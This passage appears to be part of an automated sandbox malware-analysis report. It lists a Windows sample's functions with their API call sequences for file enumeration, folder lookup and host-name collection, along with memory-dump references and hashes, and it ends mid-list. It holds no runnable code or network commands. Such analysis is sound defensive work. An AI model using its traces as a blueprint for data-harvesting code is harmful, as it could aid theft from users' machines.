                            • API ID: ExitGlobalMemoryProcessStatus
                            • String ID: @
                            • API String ID: 803317263-2766056989
                            • Opcode ID: 90b4fe2daa9d5133f6951935a95775fd029a15e74732101c4145456168cb0bf5
                            • Instruction ID: 28ce563f78c6fb56bea60dadde4cf2b367b0f014e09b5d203104d28af1587831
                            • Opcode Fuzzy Hash: 90b4fe2daa9d5133f6951935a95775fd029a15e74732101c4145456168cb0bf5
                            • Instruction Fuzzy Hash: 0EF027702082C89BEF10AA66D80E32DF7D8FB02350F104929DE9AC3180E630C9408127
                            Function 00902CA0 Relevance: 4.5, APIs: 3, Instructions: 44memoryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 2957 902ca0-902cf2 GetProcessHeap RtlAllocateHeap GetComputerNameA 2958 902d14-902d29 2957->2958 2959 902cf4-902d06 2957->2959
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 00902CCF
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00902CD6
                            • GetComputerNameA.KERNEL32(00000000,00000104), ref: 00902CEA
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateComputerNameProcess
                            • String ID:
                            • API String ID: 1664310425-0
                            • Opcode ID: 1d145901a61808dd79af4b1acbc968242f5910b61fc0a34b9b3af027652ea45c
                            • Instruction ID: b188ae29a7bfbef4d410fa74c99c6d5a1f71af765c06c2af70870a84e1ba3db2
                            • Opcode Fuzzy Hash: 1d145901a61808dd79af4b1acbc968242f5910b61fc0a34b9b3af027652ea45c
                            • Instruction Fuzzy Hash: B401ADB2A44248ABC710CF99ED49BAAB7BCF748B21F10426AF919D3780D774590086E1

                            Non-executed Functions

                            Function 008F24E0 Relevance: 223.6, APIs: 126, Strings: 1, Instructions: 1308stringfileCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 008F2524
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F2547
                            • lstrcat.KERNEL32(00000000,00000000), ref: 008F2552
                            • lstrlen.KERNEL32(\*.*), ref: 008F255D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F257A
                            • lstrcat.KERNEL32(00000000,\*.*), ref: 008F2586
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F25BA
                            • FindFirstFileA.KERNEL32(00000000,?), ref: 008F25D6
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                            • String ID: \*.*
                            • API String ID: 2567437900-1173974218
                            • Opcode ID: 3899dc73451611b9284926bee84fe6af5ec562f9a388ceaf3a2c7e0839334593
                            • Instruction ID: dd034c2c40a9e26218cd0e1f605629e9603706b3ccedf31df128eab6c98dfd06
                            • Opcode Fuzzy Hash: 3899dc73451611b9284926bee84fe6af5ec562f9a388ceaf3a2c7e0839334593
                            • Instruction Fuzzy Hash: 02A28E31A1125AAFCB21AF79DC89AAE7BB8FF44700F444128F909E7251DF74DE418B91
                            Function 008E16A0 Relevance: 202.4, APIs: 114, Strings: 1, Instructions: 1164stringfileCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 008E16E2
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 008E1719
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008E176C
                            • lstrcat.KERNEL32(00000000), ref: 008E1776
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008E17A2
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008E17EF
                            • lstrcat.KERNEL32(00000000,00000000), ref: 008E17F9
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008E1825
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008E1875
                            • lstrcat.KERNEL32(00000000), ref: 008E187F
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008E18AB
                            • lstrcpy.KERNEL32(00000000,?), ref: 008E18F3
                            • lstrcat.KERNEL32(00000000,00000000), ref: 008E18FE
                            • lstrlen.KERNEL32(0091179C), ref: 008E1909
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008E1929
                            • lstrcat.KERNEL32(00000000,0091179C), ref: 008E1935
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008E195B
                            • lstrcat.KERNEL32(00000000,00000000), ref: 008E1966
                            • lstrlen.KERNEL32(\*.*), ref: 008E1971
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008E198E
                            • lstrcat.KERNEL32(00000000,\*.*), ref: 008E199A
                              • Part of subcall function 00904250: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,00000000), ref: 0090427D
                              • Part of subcall function 00904250: lstrcpy.KERNEL32(00000000,?), ref: 009042B2
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008E19C3
                            • lstrcpy.KERNEL32(00000000,?), ref: 008E1A0E
                            • lstrcat.KERNEL32(00000000,00000000), ref: 008E1A16
                            • lstrlen.KERNEL32(0091179C), ref: 008E1A21
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008E1A41
                            • lstrcat.KERNEL32(00000000,0091179C), ref: 008E1A4D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008E1A76
                            • lstrcat.KERNEL32(00000000,00000000), ref: 008E1A81
                            • lstrlen.KERNEL32(0091179C), ref: 008E1A8C
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008E1AAC
                            • lstrcat.KERNEL32(00000000,0091179C), ref: 008E1AB8
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008E1ADE
                            • lstrcat.KERNEL32(00000000,00000000), ref: 008E1AE9
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008E1B11
                            • FindFirstFileA.KERNEL32(00000000,?), ref: 008E1B45
                            • StrCmpCA.SHLWAPI(?,009117A8), ref: 008E1B70
                            • StrCmpCA.SHLWAPI(?,009117AC), ref: 008E1B8A
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 008E1BC4
                            • lstrcpy.KERNEL32(00000000,?), ref: 008E1BFB
                            • lstrcat.KERNEL32(00000000,00000000), ref: 008E1C03
                            • lstrlen.KERNEL32(0091179C), ref: 008E1C0E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008E1C31
                            • lstrcat.KERNEL32(00000000,0091179C), ref: 008E1C3D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008E1C69
                            • lstrcat.KERNEL32(00000000,00000000), ref: 008E1C74
                            • lstrlen.KERNEL32(0091179C), ref: 008E1C7F
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008E1CA2
                            • lstrcat.KERNEL32(00000000,0091179C), ref: 008E1CAE
                            • lstrlen.KERNEL32(?), ref: 008E1CBB
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008E1CDB
                            • lstrcat.KERNEL32(00000000,?), ref: 008E1CE9
                            • lstrlen.KERNEL32(0091179C), ref: 008E1CF4
                            • lstrcpy.KERNEL32(00000000,?), ref: 008E1D14
                            • lstrcat.KERNEL32(00000000,0091179C), ref: 008E1D20
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008E1D46
                            • lstrcat.KERNEL32(00000000,00000000), ref: 008E1D51
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008E1D7D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008E1DE0
                            • lstrcat.KERNEL32(00000000,00000000), ref: 008E1DEB
                            • lstrlen.KERNEL32(0091179C), ref: 008E1DF6
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008E1E19
                            • lstrcat.KERNEL32(00000000,0091179C), ref: 008E1E25
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008E1E4B
                            • lstrcat.KERNEL32(00000000,00000000), ref: 008E1E56
                            • lstrlen.KERNEL32(0091179C), ref: 008E1E61
                            • lstrcpy.KERNEL32(00000000,?), ref: 008E1E81
                            • lstrcat.KERNEL32(00000000,0091179C), ref: 008E1E8D
                            • lstrlen.KERNEL32(?), ref: 008E1E9A
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008E1EBA
                            • lstrcat.KERNEL32(00000000,?), ref: 008E1EC8
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008E1EF4
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008E1F3E
                            • GetFileAttributesA.KERNEL32(00000000), ref: 008E1F45
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 008E1F9F
                            • lstrlen.KERNEL32(012F92F0), ref: 008E1FAE
                            • lstrcpy.KERNEL32(00000000,?), ref: 008E1FDB
                            • lstrcat.KERNEL32(00000000,?), ref: 008E1FE3
                            • lstrlen.KERNEL32(0091179C), ref: 008E1FEE
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008E200E
                            • lstrcat.KERNEL32(00000000,0091179C), ref: 008E201A
                            • lstrcpy.KERNEL32(00000000,?), ref: 008E2042
                            • lstrcat.KERNEL32(00000000,00000000), ref: 008E204D
                            • lstrlen.KERNEL32(0091179C), ref: 008E2058
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008E2075
                            • lstrcat.KERNEL32(00000000,0091179C), ref: 008E2081
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$lstrlen$File$AttributesFindFirstFolderPath
                            • String ID: \*.*
                            • API String ID: 4127656590-1173974218
                            • Opcode ID: c4f9cfaca1d425c1b96306228017656a7e65e78815ec79f0651a59bbf92c7bcf
                            • Instruction ID: 664e1c3b57a588e2e6c123d77e28da8f0b54de0060c6b762eb9f62e13fb80115
                            • Opcode Fuzzy Hash: c4f9cfaca1d425c1b96306228017656a7e65e78815ec79f0651a59bbf92c7bcf
                            • Instruction Fuzzy Hash: AC926031A1129AABCF21AF6ADC88AAE77BDFF46700F444124F805E7255DB70DE418B91
                            Function 008F19F0 Relevance: 156.7, APIs: 88, Strings: 1, Instructions: 909stringfileCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 008F1A22
                            • lstrlen.KERNEL32(\*.*), ref: 008F1A2D
                            • lstrcpy.KERNEL32(00000000,?), ref: 008F1A4F
                            • lstrcat.KERNEL32(00000000,\*.*), ref: 008F1A5B
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F1A82
                            • FindFirstFileA.KERNEL32(00000000,?), ref: 008F1A97
                            • StrCmpCA.SHLWAPI(?,009117A8), ref: 008F1AB7
                            • StrCmpCA.SHLWAPI(?,009117AC), ref: 008F1AD1
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 008F1B0F
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 008F1B42
                            • lstrcpy.KERNEL32(00000000,?), ref: 008F1B6A
                            • lstrcat.KERNEL32(00000000,00000000), ref: 008F1B75
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F1B9C
                            • lstrlen.KERNEL32(0091179C), ref: 008F1BAE
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F1BD0
                            • lstrcat.KERNEL32(00000000,0091179C), ref: 008F1BDC
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F1C04
                            • lstrlen.KERNEL32(?), ref: 008F1C18
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F1C35
                            • lstrcat.KERNEL32(00000000,?), ref: 008F1C43
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F1C69
                            • lstrlen.KERNEL32(012F93E0), ref: 008F1C7F
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F1CA9
                            • lstrcat.KERNEL32(00000000,00000000), ref: 008F1CB4
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F1CDF
                            • lstrlen.KERNEL32(0091179C), ref: 008F1CF1
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F1D13
                            • lstrcat.KERNEL32(00000000,0091179C), ref: 008F1D1F
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F1D48
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F1D75
                            • lstrcat.KERNEL32(00000000,00000000), ref: 008F1D80
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F1DA7
                            • lstrlen.KERNEL32(0091179C), ref: 008F1DB9
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F1DDB
                            • lstrcat.KERNEL32(00000000,0091179C), ref: 008F1DE7
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F1E10
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F1E3F
                            • lstrcat.KERNEL32(00000000,00000000), ref: 008F1E4A
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F1E71
                            • lstrlen.KERNEL32(0091179C), ref: 008F1E83
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F1EA5
                            • lstrcat.KERNEL32(00000000,0091179C), ref: 008F1EB1
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F1EDA
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F1F09
                            • lstrcat.KERNEL32(00000000,00000000), ref: 008F1F14
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F1F3D
                            • lstrlen.KERNEL32(0091179C), ref: 008F1F69
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F1F86
                            • lstrcat.KERNEL32(00000000,0091179C), ref: 008F1F92
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F1FB8
                            • lstrlen.KERNEL32(012FDE90), ref: 008F1FCE
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F2002
                            • lstrlen.KERNEL32(0091179C), ref: 008F2016
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F2033
                            • lstrcat.KERNEL32(00000000,0091179C), ref: 008F203F
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F2065
                            • lstrlen.KERNEL32(012FE2C0), ref: 008F207B
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F20AF
                            • lstrlen.KERNEL32(0091179C), ref: 008F20C3
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F20E0
                            • lstrcat.KERNEL32(00000000,0091179C), ref: 008F20EC
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F2112
                            • lstrlen.KERNEL32(012EA7C8), ref: 008F2128
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F2150
                            • lstrcat.KERNEL32(00000000,00000000), ref: 008F215B
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F2186
                            • lstrlen.KERNEL32(0091179C), ref: 008F2198
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F21B7
                            • lstrcat.KERNEL32(00000000,0091179C), ref: 008F21C3
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F21E8
                            • lstrlen.KERNEL32(?), ref: 008F21FC
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F2220
                            • lstrcat.KERNEL32(00000000,?), ref: 008F222E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F2253
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 008F228F
                            • lstrlen.KERNEL32(012FDF80), ref: 008F229E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F22C6
                            • lstrcat.KERNEL32(00000000,00000000), ref: 008F22D1
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$lstrlen$FileFindFirst
                            • String ID: \*.*
                            • API String ID: 712834838-1173974218
                            • Opcode ID: eb6ed206f46425443d678eaea158e60eb07fb5af292b4db472a388ac7486e822
                            • Instruction ID: 0b7694107053418ad30482c4cd5e4879818a357cba27dfd585878ed667ae437a
                            • Opcode Fuzzy Hash: eb6ed206f46425443d678eaea158e60eb07fb5af292b4db472a388ac7486e822
                            • Instruction Fuzzy Hash: BB628C31A1166AABCB22AB79CC48ABFB7B9FF45700F444124B905E3251DF74DE418BA1
                            Function 008F3A70 Relevance: 144.4, APIs: 81, Strings: 1, Instructions: 869stringfileCOMMON
                            Download Yara Rule
                            APIs
                            • wsprintfA.USER32 ref: 008F3A8C
                            • FindFirstFileA.KERNEL32(?,?), ref: 008F3AA3
                            • StrCmpCA.SHLWAPI(?,009117A8), ref: 008F3ACC
                            • StrCmpCA.SHLWAPI(?,009117AC), ref: 008F3AE6
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 008F3B1F
                            • lstrcpy.KERNEL32(00000000,?), ref: 008F3B47
                            • lstrcat.KERNEL32(00000000,00000000), ref: 008F3B52
                            • lstrlen.KERNEL32(0091179C), ref: 008F3B5D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F3B7A
                            • lstrcat.KERNEL32(00000000,0091179C), ref: 008F3B86
                            • lstrlen.KERNEL32(?), ref: 008F3B93
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F3BB3
                            • lstrcat.KERNEL32(00000000,?), ref: 008F3BC1
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F3BEA
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 008F3C2E
                            • lstrlen.KERNEL32(?), ref: 008F3C38
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F3C65
                            • lstrcat.KERNEL32(00000000,00000000), ref: 008F3C70
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F3C96
                            • lstrlen.KERNEL32(0091179C), ref: 008F3CA8
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F3CCA
                            • lstrcat.KERNEL32(00000000,0091179C), ref: 008F3CD6
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F3CFE
                            • lstrlen.KERNEL32(?), ref: 008F3D12
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F3D32
                            • lstrcat.KERNEL32(00000000,?), ref: 008F3D40
                            • lstrlen.KERNEL32(012F92F0), ref: 008F3D6B
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F3D91
                            • lstrcat.KERNEL32(00000000,00000000), ref: 008F3D9C
                            • lstrlen.KERNEL32(012F93E0), ref: 008F3DBE
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F3DE4
                            • lstrcat.KERNEL32(00000000,00000000), ref: 008F3DEF
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F3E17
                            • lstrlen.KERNEL32(0091179C), ref: 008F3E29
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F3E48
                            • lstrcat.KERNEL32(00000000,0091179C), ref: 008F3E54
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F3E7A
                            • lstrcpy.KERNEL32(00000000,?), ref: 008F3EA7
                            • lstrcat.KERNEL32(00000000,00000000), ref: 008F3EB2
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F3ED9
                            • lstrlen.KERNEL32(0091179C), ref: 008F3EEB
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F3F0D
                            • lstrcat.KERNEL32(00000000,0091179C), ref: 008F3F19
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F3F42
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F3F71
                            • lstrcat.KERNEL32(00000000,00000000), ref: 008F3F7C
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F3FA3
                            • lstrlen.KERNEL32(0091179C), ref: 008F3FB5
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F3FD7
                            • lstrcat.KERNEL32(00000000,0091179C), ref: 008F3FE3
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F400C
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F403B
                            • lstrcat.KERNEL32(00000000,00000000), ref: 008F4046
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F406D
                            • lstrlen.KERNEL32(0091179C), ref: 008F407F
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F40A1
                            • lstrcat.KERNEL32(00000000,0091179C), ref: 008F40AD
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F40D5
                            • lstrlen.KERNEL32(?), ref: 008F40E9
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F4109
                            • lstrcat.KERNEL32(00000000,?), ref: 008F4117
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F4140
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 008F417F
                            • lstrlen.KERNEL32(012FDF80), ref: 008F418E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F41B6
                            • lstrcat.KERNEL32(00000000,00000000), ref: 008F41C1
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F41EA
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F422E
                            • lstrcat.KERNEL32(00000000), ref: 008F423B
                            • FindNextFileA.KERNEL32(00000000,?), ref: 008F4439
                            • FindClose.KERNEL32(00000000), ref: 008F4448
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
